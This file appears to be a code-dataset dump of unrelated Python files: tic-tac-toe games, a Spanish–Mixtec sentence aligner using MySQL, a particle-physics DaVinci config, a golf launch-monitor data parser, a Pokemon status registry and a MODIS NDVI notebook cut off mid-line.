any square free, so must return false.\r\n\r\n#If no squares are free, return false.\r\n#If at least one square is free, return true.\r\n for number in number_list:\r\n if isSpaceFree(board, number):\r\n return True\r\n return False\r\n \r\n\r\ndef chooseRandomMoveFromList(board, movesList, computerLetter):\r\n possibleMoves = []\r\n for index in movesList:\r\n if isSpaceFree(board, index):\r\n possibleMoves.append(index)\r\n\r\n for square in possibleMoves:\r\n copy = boardCopy(board)\r\n place_piece(square, computerLetter, copy)\r\n\r\n for square2 in range(NUM_SQUARES):\r\n copy2 = boardCopy(copy)\r\n if isSpaceFree(copy2, square2):\r\n place_piece(square2, computerLetter, copy2)\r\n if check_won(copy2, computerLetter):\r\n return square\r\n\r\n return random.choice(possibleMoves) \r\n \r\n\r\ndef boardCopy(board):\r\n dupeBoard = []\r\n\r\n for square in board:\r\n dupeBoard.append(square)\r\n\r\n return dupeBoard\r\n \r\n\r\ndef getComputerMove(board, computerLetter, playerLetter):\r\n for square in range(NUM_SQUARES):\r\n copy = boardCopy(board)\r\n if isSpaceFree(copy, square):\r\n place_piece(square, computerLetter, copy)\r\n if check_won(copy, computerLetter):\r\n return square\r\n\r\n for square in range(NUM_SQUARES):\r\n copy = boardCopy(board)\r\n if isSpaceFree(copy, square):\r\n place_piece(square, playerLetter, copy)\r\n if check_won(copy, playerLetter):\r\n return square\r\n\r\n # Is middle piece avaliable?\r\n # True: return number 4 and exit\r\n # False: Are the corner pieces avaliable?\r\n # True: return random free corner piece and exit\r\n # False: Are the side pieces avaliable?\r\n # True: return random free side piece and exit\r\n # False: (must be a tie) exit\r\n\r\n if isSpaceFree(board, 4):\r\n number = 4\r\n return number\r\n elif isSpacesFree(board, [0,2,6,8]):\r\n number = chooseRandomMoveFromList(board, [0,2,6,8], computerLetter)\r\n return number\r\n else:\r\n number = chooseRandomMoveFromList(board, [1,3,5,7], computerLetter)\r\n return number\r\n \r\n\r\ndef check_tie(board):\r\n \"\"\"Checks if there is a tie or not.\"\"\"\r\n for square in range(NUM_SQUARES):\r\n if isSpaceFree(board, square):\r\n return False\r\n return True\r\n\r\ndef main():\r\n \"\"\"This will be the main backbone of the whole tic-tac-toe program!\"\"\"\r\n print(\"Welcome to the legendary game of Tic-tac-toe versus Artificial Intelligence!\")\r\n game_board = create_board()\r\n display_board(game_board)\r\n playerLetter, computerLetter = player_letter()\r\n turn = first_or_second()\r\n while True:\r\n if turn == False:\r\n number = ask_number(game_board)\r\n place_piece(number, playerLetter, game_board)\r\n display_board(game_board)\r\n\r\n if check_won(game_board, playerLetter):\r\n print(\"You just beat the smartest AI in existence!\")\r\n break\r\n elif check_tie(game_board):\r\n print(\"It's a tie\")\r\n break\r\n else:\r\n turn = not turn\r\n else:\r\n number = getComputerMove(game_board, computerLetter, playerLetter)\r\n place_piece(number, computerLetter, game_board)\r\n display_board(game_board)\r\n\r\n if check_won(game_board, computerLetter):\r\n print(\"Looks like you lost. Oh well.\")\r\n break\r\n elif check_tie(game_board):\r\n print(\"It's a tie!\")\r\n break\r\n else:\r\n turn = not turn\r\n\r\nmain()\r\n \r\n#make code cleaner \r\n \r\n","sub_path":"tictactoevsai.py","file_name":"tictactoevsai.py","file_ext":"py","file_size_in_byte":6374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"434084184","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#import sqlite3\nimport math\nfrom itertools import izip\nimport mysql.connector\nimport modulopreprocesamiento\nimport codecs\n#conexion a la base de datos\nconn=mysql.connector.connect(user=\"root\",password=\"\",host=\"127.0.0.1\",database=\"bdveesavi\")\n\n#conn=sqlite3.connect(\"alineacionesdb.db\")\n\ndef crearTablaAlineaciones():\n \"\"\"Metodo para crear tabla de alineaciones\"\"\"\n global conn\n puntero=conn.cursor()\n puntero.execute(\"CREATE TABLE IF NOT EXISTS alineados(idalineacion int,oracionespaniol TEXT, oracionmixteco TEXT) ENGINE=InnoDB DEFAULT CHARSET=utf8;\") \n print(\"Tabla creada correctamente...\")\n \ncrearTablaAlineaciones()\n\ndef consultarAlineaciones():\n \"\"\"Metodo que permite consultar las alineaciones realizadas\"\"\"\n global conn\n puntero=conn.cursor()\n conn.text_factory = str\n puntero.execute('select oracionespaniol,oracionmixteco from alineados')\n datos=puntero.fetchall()\n listaalineaciones=[]\n for fila in datos:\n listaalineaciones.append(fila)\n return listaalineaciones\n\n#consultarAlineaciones()\ndef consultar():\n global conn\n puntero=conn.cursor()\n #conn.text_factory = str\n print(\"alineaciones\")\n puntero.execute('select*from alineados')\n for y in puntero:\n print(y)\n \nconsultar()\n\ndef consultaralineaciones():\n print(\"entrando a consultar\")\n lista=[]\n lista=consultarAlineaciones()\n for fila in lista:\n print(str(fila[1]))\n \n#consultaralineaciones() \n \ndef eliminarTablaAlineaciones():\n global conn\n puntero=conn.cursor()\n puntero.execute(\"delete from alineados\")\n conn.commit()\n print(\"se ha limpiado la tabla de alineados\")\n\ntry:\n import scipy.stats.norm\n norm_logsf = scipy.stats.norm.logsf\nexcept ImportError:\n def norm_cdf(z):\n \"\"\" Cumulative distribution for N(0, 1) \"\"\"\n t = 1 / (1 + 0.2316419 * z)\n return (1 - 0.3989423 * math.exp(-z * z / 2) *\n ((((1.330274429 * t - 1.821255978) * t\n + 1.781477937) * t - 0.356563782) * t + 0.319381530) * t)\n\n def norm_logsf(z):\n \"\"\" Logarithm of the survival function for N(0, 1) \"\"\"\n try:\n return math.log(1 - norm_cdf(z))\n except ValueError:\n return float('-inf')\n\n# Alignment costs: -100*log(p(x:y)/p(1:1))\nbead_costs = {\n (1, 1): 0,\n (2, 1): 230,\n (1, 2): 230,\n (0, 1): 450,\n (1, 0): 450,\n (2, 2): 440\n}\n\n# Length cost parameters\nmean_xy = 1\nvariance_xy = 6.8\nLOG2 = math.log(2)\n\ndef length_cost(sx, sy):\n \"\"\" -100*log[p(|N(0, 1)|>delta)] \"\"\"\n lx, ly = sum(sx), sum(sy)\n m = (lx + ly * mean_xy) / 2\n try:\n delta = (lx - ly * mean_xy) / math.sqrt(m * variance_xy)\n except ZeroDivisionError:\n return float('-inf')\n return - 100 * (LOG2 + norm_logsf(abs(delta)))\n\n\ndef _align(x, y):\n m = {}\n for i in range(len(x) + 1):\n for j in range(len(y) + 1):\n if i == j == 0:\n m[0, 0] = (0, 0, 0)\n else:\n m[i, j] = min((m[i-di, j-dj][0] +\n length_cost(x[i-di:i], y[j-dj:j]) +\n bead_cost,\n di, dj)\n for (di, dj), bead_cost in bead_costs.iteritems()\n if i-di>=0 and j-dj>=0)\n\n i, j = len(x), len(y)\n while True:\n (c, di, dj) = m[i, j]\n if di == dj == 0:\n break\n yield (i-di, i), (j-dj, j)\n i -= di\n j -= dj\n\n\ndef char_length(sentence):\n \"\"\" Length of a sentence in characters \"\"\"\n return sum(1 for c in sentence if c != ' ')\n\n#metodo de alineacion \ndef align(sx, sy):\n \"\"\" Align two groups of sentences \"\"\"\n cx = map(char_length, sx)\n cy = map(char_length, sy)\n for (i1, i2), (j1, j2) in reversed(list(_align(cx, cy))):\n yield ' '.join(sx[i1:i2]), ' '.join(sy[j1:j2])\n\ndef read_blocks(f):\n block = []\n for l in f:\n if not l.strip():\n yield block\n block = []\n else:\n block.append(l.strip())\n if block:\n yield block\n \ntotalelementos=0\ncuentaalineacion=0\ndef principal(rutasalida):\n \n listaespaniol=[]\n listamixteco=[]\n \n listaespaniol=modulopreprocesamiento.consultarcorpusespaniol()\n listamixteco=modulopreprocesamiento.consultarcorpusmixteco()\n \n for block_x,block_y in izip(listaespaniol,listamixteco):\n \n for (oracionorigen,oraciondestino) in align(block_x,block_y):\n \n global totalelementos\n totalelementos+=1\n global conn\n posicion=conn.cursor()\n #cursor.text_factory = str\n \n oracionorigen=oracionorigen.encode(\"utf-8\")\n oraciondestino=oraciondestino.encode(\"utf-8\")\n \n posicion.execute(\"INSERT INTO alineados(idalineacion,oracionespaniol,oracionmixteco) values(%s,%s,%s)\",(totalelementos,str(oracionorigen),str(oraciondestino)))\n \n print(\"----\"+str(totalelementos))\n \n conn.commit()\n print(\"alineaciones insertadas correctamente...\")\n\n print('%s ||| %s' % (oracionorigen, oraciondestino))\n \n archivo=codecs.open(rutasalida,encoding=\"utf8\",mode=\"w\")\n listaalineaciones=consultarAlineaciones()\n for x in listaalineaciones:\n global cuentaalineacion\n cuentaalineacion+=1\n texto=u\"#espaniol##mixteco##\"+x[0]+\"##\"+x[1]+'\\n'\n archivo.write(texto)\n \n #archivo.write(\" \"+str(totalelementos)+\" \")\n archivo.close()\n \neliminarTablaAlineaciones()\nmodulopreprocesamiento.limpiartablacorpusespaniol()\nmodulopreprocesamiento.limpiartablacorpusmixteco()\n \n","sub_path":"src/moduloalineador.py","file_name":"moduloalineador.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497288198","text":"listOfScores = []\nfor _ in range(int(input())):\n name = input()\n score = float(input())\n listOfScores.append([name,score])\nscoreList = [i[1] for i in listOfScores]\nsecondHighest = (sorted(set(scoreList),reverse=True)[-2])\n\nfor i in sorted(listOfScores):\n if i[1] == secondHighest:\n print(i[0])","sub_path":"code-files/Day-021-030/Day-21/Question-1/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"327221772","text":"\"\"\"\nTic Tac Toe Player\n\"\"\"\n\nimport math\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\n\ndef initial_state():\n \"\"\"\n Returns starting state of the board.\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\n\ndef player(board):\n \"\"\"\n Returns player who has the next turn on a board.\n \"\"\"\n num_of_x = 0\n num_of_o = 0\n for i in range(3):\n for j in range(3):\n if board[i][j] == \"X\":\n num_of_x += 1\n elif board[i][j] == \"O\":\n num_of_o += 1\n\n if num_of_x == num_of_o:\n return \"X\"\n else:\n return \"O\"\n\n\n\ndef actions(board):\n \"\"\"\n Returns set of all possible actions (i, j) available on the board.\n \"\"\"\n set_of_actions = set()\n\n for i in range(3):\n for j in range(3):\n if board[i][j] == None:\n set_of_actions.add((i, j))\n \n return set_of_actions\n\n\ndef result(board, action):\n \"\"\"\n Returns the board that results from making move (i, j) on the board.\n \"\"\"\n tmp_board = board\n\n turn = player(board)\n tmp_board[action[0]][action[1]] = turn\n return tmp_board\n\n\ndef winner(board):\n \"\"\"\n Returns the winner of the game, if there is one.\n \"\"\"\n if board[0][0] == board[1][0] and board[0][0] == board[2][0]:\n return board[0][0]\n if board[0][1] == board[1][1] and board[0][1] == board[1][1]:\n return board[0][1]\n if board[0][2] == board[1][2] and board[0][2] == board[2][2]:\n return board[0][2]\n if board[0][0] == board[0][1] and board[0][0] == board[0][2]:\n return board[0][0]\n if board[1][0] == board[1][1] and board[1][0] == board[1][2]:\n return board[1][0]\n if board[2][0] == board[2][1] and board[2][0] == board[2][2]:\n return board[2][0]\n if board[0][0] == board[1][1] and board[0][0] == board[2][2]:\n return board[0][0]\n if board[0][2] == board[1][1] and board[0][2] == board[2][0]:\n return board[0][0]\n\n return None\n\ndef terminal(board):\n \"\"\"\n Returns True if game is over, False otherwise.\n \"\"\"\n cnt = 0\n for i in range(3):\n for j in range(3):\n if board[i][j] == \"X\" or board[i][j] == \"O\":\n cnt += 1\n \n if cnt == 9:\n return True\n else:\n return False\n\n\ndef utility(board):\n \"\"\"\n Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n \"\"\"\n if winner(board) == \"X\":\n return 1\n elif winner(board) == \"O\":\n return -1\n else:\n return 0\n\ndef find_max(board):\n if terminal(board):\n return utility(board)\n\n best = -(2 ** 32)\n\n for action in actions(board):\n res = find_min(result(board, action))\n\n best = max(res, best)\n \n return best\n\ndef find_min(board):\n if terminal(board):\n return utility(board)\n\n best = 2 ** 32\n\n for action in actions(board):\n res = find_max(result(board, action))\n\n best = min(best, res)\n\n return best\n\ndef minimax(board):\n \"\"\"\n Returns the optimal action for the current player on the board.\n \"\"\"\n if terminal(board):\n return None\n\n x = -1\n y = -1\n\n if player(board) == \"X\":\n best = -(2 ** 32)\n\n for action in actions(board):\n v = find_max(result(board, action))\n\n if best < v:\n x = action[0]\n y = action[1]\n best = find_max(result(board, action))\n\n else:\n best = (2 ** 32)\n\n for action in actions(board):\n v = find_min((result(board, action)))\n\n if best > v:\n x = action[0]\n y = action[1]\n best = v\n\n return (x, y)\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"125459110","text":"# $Id: $\n# Test your line(s) of the stripping\n# \n# NOTE: Please make a copy of this file for your testing, and do NOT change this one!\n#\n\nfrom Gaudi.Configuration import *\n#from Configurables import DaVinci\nfrom StrippingConf.Configuration import StrippingConf\n\n# Tighten Trk Chi2 to <3\nfrom CommonParticles.Utils import DefaultTrackingCuts\nDefaultTrackingCuts().Cuts = { \"Chi2Cut\" : [ 0, 3 ],\n \"CloneDistCut\" : [5000, 9e+99 ] }\n\nfrom Configurables import DecayTreeTuple, FitDecayTrees, TupleToolRecoStats, TupleToolTrigger, TupleToolTISTOS, CondDB, SelDSTWriter\nfrom DecayTreeTuple.Configuration import *\n# Now build the stream\nfrom StrippingConf.StrippingStream import StrippingStream\nstream = StrippingStream(\"Test\")\n\n# Append your line\n\n\n\nfrom StrippingSelections.StrippingB2XMuMu import B2XMuMuConf\nfrom StrippingSelections.StrippingB2XMuMu import defaultConfig\n\n\n#inclusiveConfig['DIRA_HIGHQ2'] = -0.90\n#inclusiveConfig['DIRA_LOWQ2'] = 0.99\n#inclusiveConfig['VertexCHI2'] = 2.0\n#inclusiveConfig['Muon_PIDmu'] = 2\n#inclusiveConfig['Muon_MinIPCHI2'] = 16\n#inclusiveConfig['Muon_PT'] = 800\n#inclusiveConfig['WS'] = False\n#inclusiveConfig['LOWERMASS_LOWQ2'] = 1500\n#inclusiveConfig['UPPERMASS_LOWQ2'] = 2200\n\nIncXMuMuBuilder = B2XMuMuConf( name=\"B2XMuMu\", config=defaultConfig )\nstream.appendLines( IncXMuMuBuilder.lines() )\nIncXMuMuBuilder2 = B2XMuMuConf( name=\"B2XMuMu2\", config=defaultConfig )\n#stream.appendLines( IncXMuMuBuilder2.lines() )\n\n# Standard configuration of Stripping, do NOT change them\nfrom Configurables import ProcStatusCheck\nfilterBadEvents = ProcStatusCheck()\n\nsc = StrippingConf( Streams = [ stream ],\n MaxCandidates = 2000,\n AcceptBadEvents = False,\n BadEventSelection = filterBadEvents,\n TESPrefix = 'Strip'\n )\n\nfrom Configurables import AuditorSvc, ChronoAuditor\nAuditorSvc().Auditors.append( ChronoAuditor(\"Chrono\") )\n\nfrom Configurables import StrippingReport\nsr = StrippingReport(Selections = sc.selections())\n\nfrom Configurables import AlgorithmCorrelationsAlg\nac = AlgorithmCorrelationsAlg(Algorithms = sc.selections())\n\ntuple = DecayTreeTuple(\"Jpsi_Tuple\")\n\ntuple.Inputs = [\"Phys/B2XMuMu_Line/Particles\"]\n#tuple.Inputs = [\"Phys/B2XMuMuInclusive2_InclDiMuLowQ2Line/Particles\"]\n\n\ntuple.ToolList = [\n \"TupleToolKinematic\"\n , \"TupleToolEventInfo\"\n , \"TupleToolRecoStats\"\n # , \"TupleBuKmmFit\"\n]\n\n\ntuple.addBranches ({ \n \"muplus\" : \"[B+ -> (J/psi(1S) -> ^mu+ mu-) K+]CC\",\n \"muminus\" : \"[B+ -> (J/psi(1S) -> mu+ ^mu-) K+]CC\",\n \"Jpsi\" : \"[B+ -> ^(J/psi(1S) -> mu+ mu-) K+]CC\",\n \"Kplus\" : \"[B+ -> J/psi(1S) ^K+]CC\",\n \"Bplus\" : \"[B+ -> J/psi(1S) K+]CC\",\n})\nLoKi_All=tuple.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_All\")\nLoKi_All.Variables = {\n 'MINIPCHI2' : \"MIPCHI2DV(PRIMARY)\", \n 'MINIP' : \"MIPDV(PRIMARY)\",\n 'IPCHI2_OWNPV' : \"BPVIPCHI2()\", \n 'IP_OWNPV' : \"BPVIP()\"\n}\n\nLoKi_muplus=tuple.muplus.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_muplus\")\nLoKi_muplus.Variables = {\n 'PIDmu' : \"PIDmu\",\n 'ghost' : \"TRGHP\",\n 'TRACK_CHI2' : \"TRCHI2DOF\",\n 'NNK' : \"PPINFO(PROBNNK)\",\n 'NNpi' : \"PPINFO(PROBNNpi)\",\n 'NNmu' : \"PPINFO(PROBNNmu)\"\n}\n\nLoKi_Kplus=tuple.Kplus.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_Kplus\")\nLoKi_Kplus.Variables = {\n 'PIDK' : \"PIDK\",\n 'PIDmu' : \"PIDmu\",\n 'ghost' : \"TRGHP\",\n 'TRACK_CHI2' : \"TRCHI2DOF\",\n 'NNK' : \"PPINFO(PROBNNK)\",\n 'NNpi' : \"PPINFO(PROBNNpi)\",\n 'NNmu' : \"PPINFO(PROBNNmu)\"\n}\n\nLoKi_muminus=tuple.muminus.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_Kminus\")\nLoKi_muminus.Variables = {\n 'PIDK' : \"PIDK\",\n 'PIDmu' : \"PIDmu\",\n 'ghost' : \"TRGHP\",\n 'TRACK_CHI2' : \"TRCHI2DOF\",\n 'NNK' : \"PPINFO(PROBNNK)\",\n 'NNpi' : \"PPINFO(PROBNNpi)\",\n 'NNmu' : \"PPINFO(PROBNNmu)\"\n}\n\n\nLoKi_Bplus=tuple.Bplus.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_Bplus\")\nLoKi_Bplus.Variables = {\n 'DTF_CHI2' : \"DTF_CHI2NDOF(True)\",\n 'TAU' : \"BPVLTIME()\",\n 'DIRA_OWNPV' : \"BPVDIRA\",\n 'FD_CHI2' : \"BPVVDCHI2\",\n 'Mcorr' : \"BPVCORRM\",\n 'ENDVERTEX_CHI2' : \"VFASPF(VCHI2/VDOF)\",\n \"CONE_angle\" : \"RELINFO('Phys/B2XMuMu_Line/ConeIsoInfo','CONEANGLE', -1.)\",\n \"CONE_PT\" : \"RELINFO('Phys/B2XMuMu_Line/ConeIsoInfo','CONEPT', -1.)\",\n \"BDTIso\" : \"RELINFO('Phys/B2XMuMu_Line/VtxIsoBDTInfo','VTXISOBDTHARDFIRSTVALUE', -1.)\",\n \"NormalVtxIso\" : \"RELINFO('Phys/B2XMuMu_Line/VtxIsoInfo','VTXISONUMVTX', -1.)\"\n}\n\n\nlist = [\n \"L0DiMuonDecision\"\n , \"L0MuonDecision\"\n , \"Hlt1TrackAllL0Decision\"\n , \"Hlt1TrackMuonDecision\"\n , \"Hlt1DiMuonLowMassDecision\"\n , \"Hlt1DiMuonHighMassDecision\"\n , \"Hlt1SingleMuonHighPTDecision\"\n , \"Hlt2TopoMu2BodyBBDTDecision\"\n , \"Hlt2TopoMu3BodyBBDTDecision\"\n , \"Hlt2Topo2BodyBBDTDecision\"\n , \"Hlt2Topo3BodyBBDTDecision\"\n , \"Hlt2DiMuonDetachedDecision\"\n , \"Hlt2SingleMuonDecision\"\n , \"Hlt2DiMuonDetachedHeavyDecision\"\n]\n\ntuple.Decay = \"[B+ -> ^(J/psi(1S) -> ^mu+ ^mu-) ^K+]CC\"\nfrom Configurables import DaVinci\n#DaVinci().HistogramFile = 'DV_stripping_histos.root'\nDaVinci().EvtMax = 100000\nDaVinci().PrintFreq = 2000\nDaVinci().appendToMainSequence( [ sc.sequence() ] )\nDaVinci().appendToMainSequence( [ tuple ] )\nDaVinci().appendToMainSequence( [ sr ] )\nDaVinci().appendToMainSequence( [ ac ] )\nDaVinci().DataType = \"2015\"\n#DaVinci().InputType = \"DST\"\n\n# change the column size of timing table\nfrom Configurables import TimingAuditor, SequencerTimerTool\nTimingAuditor().addTool(SequencerTimerTool,name=\"TIMER\")\nTimingAuditor().TIMER.NameSize = 60\nNTupleSvc().Output = [\"FILE1 DATAFILE='rootfile.root' TYP='ROOT' OPT='NEW'\"]\nMessageSvc().Format = \"% F%60W%S%7W%R%T %0W%M\"\n\n# database\nDaVinci().DDDBtag = \"dddb-20120831\"\nDaVinci().CondDBtag = \"cond-20121008\"\n\n# input file\nfrom GaudiConf import IOHelper\n\nIOHelper().inputFiles(['./00049671_00004163_1.leptonic.mdst'], clear=True)\n\n","sub_path":"DaVinci_v39r1/tuplemaking/jpsikstPID2/data/2012/test_B2XMuMu.py","file_name":"test_B2XMuMu.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"442011962","text":"\"\"\"\nParse the raw data into a usable format.\n\"\"\"\n\nimport datetime\nfrom collections import defaultdict\nfrom typing import Any, Dict, List, Optional\n\nfrom upload.exceptions import ParsingException\n\n\nSKYTRAK_TIMESTAMP_FORMAT = \"%m/%d/%Y %I:%M %p\"\n\n\nclass SessionInfo:\n \"\"\"\n Metadata included in the Skytrak data files.\n \"\"\"\n\n def __init__(self) -> None:\n self.name: Optional[str] = None\n self.timestamp: Optional[datetime.datetime] = None\n self.type_: Optional[str] = None\n self.notes: Dict[str, str] = {}\n\n def json(self) -> Dict[str, Any]:\n if not all([self.name, self.type_, self.timestamp]):\n raise ParsingException(\"name, timestamp, or type missing from session info\")\n return {\n \"name\": self.name,\n \"timestamp\": self.timestamp.isoformat(timespec=\"minutes\"), # type: ignore\n \"session_type\": self.type_,\n \"notes\": self.notes,\n }\n\n\nclass Parser:\n pass\n\n\nclass RangeDataParser(Parser):\n \"\"\"\n Parses data of the raw shot data tables.\n\n This is the format of the data for the driving range, skills assessment, and\n game improvement when exporting the data from the history tab.\n \"\"\"\n\n COLUMNS = [\n \"SHOT\",\n \"HAND\",\n \"BALL\",\n \"LAUNCH\",\n \"BACK\",\n \"SIDE\",\n \"SIDE\",\n \"OFFLINE\",\n \"CARRY\",\n \"ROLL\",\n \"TOTAL\",\n \"FLIGHT\",\n \"DSCNT\",\n \"HEIGHT\",\n \"CLUB\",\n \"PTI\",\n ]\n NAMES = [\n \"shot_num\",\n \"hand\",\n \"ball_speed\",\n \"launch_angle\",\n \"back_spin\",\n \"side_spin\",\n \"side_angle\",\n \"offline_distance\",\n \"carry\",\n \"roll\",\n \"total\",\n \"hang_time\",\n \"descent_angle\",\n \"peak_height\",\n \"club_speed\",\n \"pti\",\n ]\n\n def __init__(self, data: List[List[str]]) -> None:\n self.raw_data = data\n self.session_info = SessionInfo()\n\n def extract_name(self) -> None:\n \"\"\"\n Exracts the username and sets it's value in SessionSettings.\n \"\"\"\n try:\n field = self.raw_data[2][0]\n except IndexError:\n raise ParsingException(\n \"Could not extract name from data, name field not present\"\n )\n\n try:\n name = field.split(\":\")[1].strip()\n except IndexError:\n raise ParsingException(\n \"Could not extract name from data, incorrect field format\"\n )\n\n self.session_info.name = name.title()\n\n def extract_type(self) -> None:\n \"\"\"\n Exracts the session type and sets it's value in SessionSettings.\n \"\"\"\n try:\n field = self.raw_data[1][0]\n except IndexError:\n raise ParsingException(\n \"Could not extract type from data, type field not present\"\n )\n\n try:\n type_ = field.split(\":\")[0].strip()\n except IndexError:\n raise ParsingException(\n \"Could not extract type from data, incorrect field format\"\n )\n\n self.session_info.type_ = type_.lower()\n\n def extract_timestamp(self) -> None:\n \"\"\"\n Exracts the timestamp of the session and sets it's value in SessionSettings.\n \"\"\"\n try:\n field = self.raw_data[1][0]\n except IndexError:\n raise ParsingException(\n \"Could not timestamp name from data, timestamp field not present\"\n )\n\n try:\n timestamp = field.split(\":\", 1)[1].strip()\n except IndexError:\n raise ParsingException(\n \"Could not extract timestamp from data, incorrect field format\"\n )\n\n self.session_info.timestamp = datetime.datetime.strptime(\n timestamp, SKYTRAK_TIMESTAMP_FORMAT\n )\n\n def extract_notes(self) -> None:\n \"\"\"\n Exracts the session notes that are included in the export field\n and sets it's value in SessionSettings.\n \"\"\"\n pass\n\n def verify_columns(self) -> None:\n \"\"\"\n Verifies that the columns of the data are expected.\n \"\"\"\n try:\n row = self.raw_data[4]\n except IndexError:\n raise ParsingException(\n \"Could not extract columns from data, column row not present\"\n )\n\n if row != self.COLUMNS:\n raise ParsingException(\"Invalid columns for Range Data\")\n\n def data_by_club(self) -> Dict[str, List[List[str]]]:\n \"\"\"\n Gathers the data by club from the raw data and combines them\n for the given club.\n \"\"\"\n data: Dict[str, List[List[str]]] = defaultdict(list)\n started = False\n club = \"\"\n for row in self.raw_data:\n if not started:\n if row[0] == \"#\":\n started = True\n continue\n\n if not row[0] or row[0] == \"AVG\":\n continue\n\n if row[0] == \"NOTES\":\n break\n\n try:\n int(row[0])\n except ValueError:\n data_row = False\n else:\n data_row = True\n\n if data_row:\n data[club].append(row)\n else:\n club = row[0].split(\"#\")[0].strip().lower()\n\n return data\n\n def data_rows(self) -> List[Dict[str, str]]:\n \"\"\"\n Transforms the data by club into a large list of dicts.\n \"\"\"\n data: List[Dict[str, str]] = []\n shot_num = 1\n for club, rows in self.data_by_club().items():\n for row in rows:\n row_dict = {}\n for n, item in enumerate(row):\n row_dict[self.NAMES[n]] = item\n row_dict[\"club\"] = club\n row_dict[\"shot_num\"] = str(shot_num)\n data.append(row_dict)\n shot_num += 1\n\n return data\n\n def json(self) -> Dict[str, Any]:\n \"\"\"\n Calls all verification and extraction steps then adds the metadata\n to each row.\n \"\"\"\n self.verify_columns()\n self.extract_name()\n self.extract_type()\n self.extract_timestamp()\n self.extract_notes()\n data = self.session_info.json()\n data[\"shots\"] = self.data_rows()\n return data\n\n\nPARSER_MAPPING = {\"driving range\": RangeDataParser}\n\n\ndef json_from_raw(data: List[List[str]], session_type: str) -> Dict[str, Any]:\n \"\"\"\n Returns formatted json data for the given raw data type.\n \"\"\"\n parser = PARSER_MAPPING[session_type](data)\n return parser.json()\n","sub_path":"upload/upload/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155245243","text":"from typing import TypeVar, Dict, NoReturn, Optional\nimport pokemon.status.pokemon_status as pst\n\nSTATUS: Dict[str, 'pst.Status'] = {}\n\nT = TypeVar('T', )\n\n\ndef register(it: T) -> T:\n\n if it.id_ in STATUS:\n raise ValueError(\"duplicate key in items registry {}\".format(it.id_))\n\n STATUS[it.id_] = it\n return it\n\n\nBURN: Optional['pst.BurnStatus'] = None\nFLINCH: Optional['pst.FlinchingStatus'] = None\n\n\ndef load() -> NoReturn:\n global BURN, FLINCH\n BURN = register(pst.BurnStatus(\"burn\"))\n FLINCH = register(pst.FlinchingStatus(\"flinch\"))\n print(STATUS)\n","sub_path":"pokemon/status/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"533412782","text":"\n# coding: utf-8\n\n# ## Take a look at channel 1 and NDVI at full resolution for Vancouver\n# \n# * [Modis channel listing](https://modis.gsfc.nasa.gov/about/specifications.php)\n# \n# * Band 1 centered at 0.645 microns (red)\n# \n# * data acquired at 250 m resolution, August 11, 2016\n# \n# * I've written the measurements between -125 -> -120 deg lon and 45-50 degrees lat to\n# an hdf: vancouver_hires.h5, download in the cell below\n# \n# * see what channel 1 and the [ndvi](https://en.wikipedia.org/wiki/Normalized_Difference_Vegetation_Index) look like at 250 meter resoluiton\n\n# In[1]:\n\nfrom a301utils.a301_readfile import download\nimport numpy as np\nimport h5py\nimport sys\nimport a301lib\nfrom a301lib.geolocate import fast_hist, fast_avg, fast_count,make_plot \nfrom a301lib.radiation import planckInvert\nfrom matplotlib import pyplot as plt\n#\n# use hdfview to see the structure of this file\n#\nfilename = 'vancouver_hires.h5'\ndownload(filename)\nh5_file=h5py.File(filename)\n\n\n# In[ ]:\n\n\n\n\n# In[2]:\n\nlat_data=h5_file['latlon']['lat'][...]\nlon_data=h5_file['latlon']['lon'][...]\nfrom a301lib.geolocate import find_corners\ncorners=find_corners(lat_data,lon_data)\n\n\n# Here is the corresponding red,green,blue color composite for the granule.\n\n# In[3]:\n\nfrom IPython.display import Image\nImage(url='figures/MYBRGB.A2016224.2100.006.2016237025650.jpg',width=600)\n\n\n# In[4]:\n\nget_ipython().magic('matplotlib inline')\nindex=0\nchan1_refl=h5_file['data_fields']['chan1'][...]\nchan2_refl=h5_file['data_fields']['chan2'][...]\nndvi = (chan2_refl - chan1_refl)/(chan2_refl + chan1_refl)\nplt.hist(ndvi)\nax=plt.gca() #get current axis\n_=ax.set(title='ndvi Vancouver')\n\n\n# Now call the planckInvert function imported at the top of the notebook to convert radiance to brightness temperature\n\n# In[5]:\n\nlon_min= -125\nlon_max = -120\n\nlat_min = 45\nlat_max = 50\nbinsize = 0.008\n\nlon_hist = fast_hist(lon_data.ravel(),lon_min,lon_max,binsize=binsize)\nlat_hist = fast_hist(lat_data.ravel(),lat_min,lat_max,binsize=binsize)\ngridded_chan1 = fast_avg(lat_hist,lon_hist,chan1_refl.ravel())\ngridded_ndvi = fast_avg(lat_hist,lon_hist,ndvi.ravel())\n\n\n# In[6]:\n\nlat_centers=lat_hist['centers_vec']\nlon_centers=lon_hist['centers_vec']\nlon_array,lat_array=np.meshgrid(lon_centers,lat_centers)\nprint(lon_array.shape)\nmasked_reflects = np.ma.masked_invalid(gridded_chan1)\nmasked_ndvi = 